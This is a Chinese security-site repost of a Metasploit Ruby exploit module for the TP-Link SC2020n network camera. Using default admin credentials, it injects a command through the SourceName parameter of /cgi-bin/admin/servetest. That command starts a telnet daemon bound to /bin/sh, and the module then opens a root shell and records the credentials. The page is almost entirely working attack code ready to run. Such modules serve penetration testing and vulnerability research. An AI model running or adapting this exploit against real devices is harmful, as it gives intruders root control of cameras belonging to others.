首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TP-Link SC2020n Authenticated Telnet Injection
来源:metasploit.com 作者:Starke 发布时间:2016-05-17  
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote

    include Msf::Exploit::Remote::Telnet
    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
          'Name'        => 'TP-Link SC2020n Authenticated Telnet Injection',
          'Description' => %q{
            The TP-Link SC2020n Network Video Camera is vulnerable
            to OS Command Injection via the web interface. By firing up the telnet daemon,
            it is possible to gain root on the device.  The vulnerability
            exists at /cgi-bin/admin/servetest, which is accessible with credentials.
          },
          'Author'      =>
            [
                'Nicholas Starke <nick@alephvoid.com>'
            ],
          'License'         => MSF_LICENSE,
          'DisclosureDate'  => 'Dec 20 2015',
          'Privileged'      => true,
          'Platform'        => 'unix',
          'Arch'            => ARCH_CMD,
          'Payload'         =>
            {
              'Compat'  => {
              'PayloadType'    => 'cmd_interact',
              'ConnectionType' => 'find',
              },
            },
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
          'Targets'        =>
            [
              [  'Automatic',     { } ],
            ],
          'DefaultTarget'  => 0
         ))

        register_options(
          [
            OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
            OptString.new('PASSWORD', [ true, 'Password to login with', 'admin'])
          ], self.class)

        register_advanced_options(
          [
            OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet Command', 10]),
            OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
          ], self.class)
    end

    def telnet_timeout
      (datastore['TelnetTimeout'] || 10).to_i
    end

    def banner_timeout
      (datastore['TelnetBannerTimeout'] || 25).to_i
    end

    def exploit
      print_status('Exploiting')
      user = datastore['USERNAME']
      pass = datastore['PASSWORD']
      test_login(user, pass)
      exploit_telnet
    end


    def test_login(user, pass)
        print_status("Trying to login with #{user} : #{pass}")
        begin
          res = send_request_cgi({
            'uri' => '/',
            'method' => 'GET',
            'authorization' => basic_auth(user, pass)
          })

          if res.nil?
            fail_with(Failure::Unknown, "Could not connect to web service - no response")
          end

          if (res.code != 200)
            fail_with(Failure::Unknown, "Could not connect to web service - invalid credentials (response code: #{res.code}")
          else
            print_good("Successful login #{user} : #{pass}")
            save_cred(user, pass)
          end
        rescue ::Rex::ConnectionError
          fail_with(Failure::Unknown, "Could not connect to the web service")
        end
    end

    def exploit_telnet
        telnet_port = rand(32767) + 32768

        print_status("Telnet Port: #{telnet_port}")

        cmd = "telnetd -p #{telnet_port} -l/bin/sh"

        telnet_request(cmd)

        print_status("Trying to establish telnet connection...")
        ctx = { 'Msf' => framework, 'MsfExploit' => self }
        sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => telnet_timeout })

        begin
          if sock.nil?
            fail_with(Failure::Unreachable, "Backdoor service unreachable")
          end

          add_socket(sock)

          print_status("Trying to establish a telnet session...")
          prompt = negotiate_telnet(sock)

          if prompt.nil?
            sock.close
            fail_with(Failure::Unknown, "Unable to establish a telnet session")
          else
            print_good("Telnet session successfully established")
          end

          handler(sock)
        rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
          sock.close if sock
          fail_with(Failure::Unknown, e.message)
        end
    end

    def telnet_request(cmd)

        uri = '/cgi-bin/admin/servetest'

        begin
          res = send_request_cgi({
            'uri' => uri,
            'method' => 'GET',
            'vars_get' => {
                'cmd' => 'ftp',
                'ServerName' => 'test',
                'userName' => 'test',
                'Password' => 'test',
                'Passive' => 'off',
                'SourceName' => "/var/ftptest;#{cmd};#",
                'TargetName' => 'testfile'
            }
          })
          return res
        rescue ::Rex::ConnectionError
          fail_with(Failure::Unreachable, "Could not connect to the web service")
        end
    end

    def negotiate_telnet(sock)
      begin
        Timeout.timeout(banner_timeout) do
          while(true)
            data = sock.get_once(-1, telnet_timeout)
            return nil if not data or data.length == 0
            if data =~ /#/
              return true
            end
          end
        end
      rescue ::Timeout::Error
        return nil
      end
    end

  def save_cred(username, password)
    service_data = {
      address: rhost,
      port: rport,
      service_name: 'telnet',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: self.fullname,
      origin_type: :service,
      username: username,
      private_data: password,
      private_type: :password
    }.merge(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
      core: credential_core,
      last_attempted_at: DateTime.now,
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    }.merge(service_data)

    create_credential_login(login_data)
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Meteocontrol WEB’log - Admin
·Dell SonicWALL Scrutinizer 11.
·eXtplorer 2.1.9 - Archive Path
·Magento < 2.0.6 - Unauthentica
·Web interface for DNSmasq / Mi
·Cisco ASA Software IKEv1 / IKE
·NRSS Reader 0.3.9 - Local Stac
·VirIT Explorer Lite & Pro 8.1.
·runAV mod_security - Arbitrary
·Android Broadcom Wi-Fi Driver
·Operation Technology ETAP 14.1
·Microsoft Excel 2010 - Crash P
  推荐广告
CopyRight © 2002-2020 VFocuS.Net All Rights Reserved